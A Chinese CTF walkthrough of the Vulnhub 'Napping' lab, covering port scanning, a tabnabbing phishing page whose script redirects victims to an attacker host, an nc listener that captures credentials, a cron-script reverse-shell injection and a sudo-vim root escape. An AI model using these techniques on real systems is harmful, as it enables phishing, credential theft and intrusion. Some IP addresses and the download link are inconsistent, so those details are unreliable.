前期准备

靶机下载地址：https://www.vulnhub.com/entry/red-1,753/
kali：192.168.147.178
靶机：192.168.147.185

一、信息收集

• 1、扫描同网段存活服务器：

arp-scan -l

• 2、nmap进行端口扫描。

nmap -A -p 1-65535 192.168.11.137
nmap -sV -O 192.168.147.185 

发现80端口开启http服务，22端口开启ssh服务。

• 3、访问80端口，收集页面信息。

发现是个登陆界面，可以注册，我们先注册登陆。

完成注册后，登陆进入界面，发现界面中间有个输入链接的输入框。

随便输入一个进行测试，提交之后发现可以点击here。

点击here以后，发现跳到hao123主页。我们查看页面源代码。

查看源代码，发现站点上的此特定 URL 链接功能容易受到Tab Nabbing钓鱼攻击。

二、漏洞攻击

• 1、TABNabbing钓鱼利用

符合该漏洞利用条件，我们制作钓鱼页面，先将login登陆界面拷贝到本地。（注：为什么是拷贝index.php ，可以利用御剑扫描该网站，或者kali dirb http://192.168.147.185
）

• 2、恶意界面的制作 sain.html

<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.147.178:8000/text1.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://192.168.11.178:8000/text1.html');
    </script>
</body>
</html>

• 3、将制作的恶意界面和下载的index.php放到 /var/www/html，并且开启 python3-http 服务，开 80 端口，和sain.html 中的端口区分开

开机8000端口监听，nc -lvvp 8000 之后，在进行下列步骤。

稍等几分钟之后会获取到监听信息，得到用户名和密码。

靶机中设定的隔几分钟就会用用户登录，此时我们获取了数据包
username=daniel
password=C@ughtm3napping123

三、ssh登陆

ssh daniel@192.168.147.785     #ssh登陆daniel尝试，发现登陆成功

查看用户信息：
可以看到 daniel 是管理员组的一部分。
使用 find 我们可以查找任何我们可以使用命令访问的有趣文件
find / -group administrators -type f 2>/dev/nul

进入目录查看query.py脚本内容，发现对访问本地服务状态进行录入，不管成功与否都写入site_status.txt文件。猜测是个定时脚本。

查看site_status.txt，发现可能是2分钟执行一次该脚本。

四、提权

• 我们发现脚本在adrian用户下定时执行，我们尝试获取adrian权限。所以我们在 /dev/shm 目录中创建一个反向 shell bash 脚本：

在query.py中加入运行该脚本代码。

在攻击机监听1234端口，等会得到反弹shell。

发现可以再没有在没有密码的情况下以 root 身份运行 vim ，获取root权限，那就直接写入vim shell

sudo /usr/bin/vim -c ':!/bin/sh'  
sudo vim -c ':!/bin/sh'

两个命令都可以获取到root权限。

参考了我关注的博主。

标签：1.0,NAPPING,端口,192.168,window,html,Vulnhub,http,界面
来源： https://www.cnblogs.com/2022zzt/p/15979673.html